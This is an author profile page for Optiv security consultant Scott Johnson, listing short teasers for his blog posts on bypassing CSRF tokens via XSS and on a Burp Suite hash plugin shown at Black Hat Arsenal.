Scott Johnson

Security Consultant

Scott Johnson is a security consultant with Optiv's application security team. His focus is on penetration testing, source code review, and mobile application assessments.

 

Bypassing CSRF Tokens via XSS

· By Scott Johnson, Tim MalcomVetter ·

Many web development platforms provide libraries that handle the creation and validation of tokens with each HTTP request to prevent Cross Site Request Forgery (CSRF). Those libraries are very useful and should definitely be part of any web application. However, the anti-CSRF tokens can still be bypassed in certain conditions.

Continue reading

Black Hat Tools Arsenal: Burp-Hash Plugin, Part 2 - How it Works

· By Scott Johnson, Tim MalcomVetter, Matt South ·

This is a follow-up post about our Burp-Hash plugin for the Burp Suite that we presented at the Black Hat USA Tools Arsenal. You can read the backstory that inspired us to create the tool in Part 1 of this post. You also can watch a quick two-minute video overview of the plugin on YouTube.

Continue reading

Black Hat Tools Arsenal: Burp-Hash Plugin – Part 1

· By Scott Johnson, Tim MalcomVetter, Matt South ·

One day a few months back, teammates Matt South and Tim MalcomVetter reviewed a report from an application security assessment performed by another teammate, Scott Johnson. These reviews occur as part of our normal quality assurance process, but it’s always interesting, and even fun, when a teammate comes across a rare type of vulnerability.

Continue reading
(3 Results)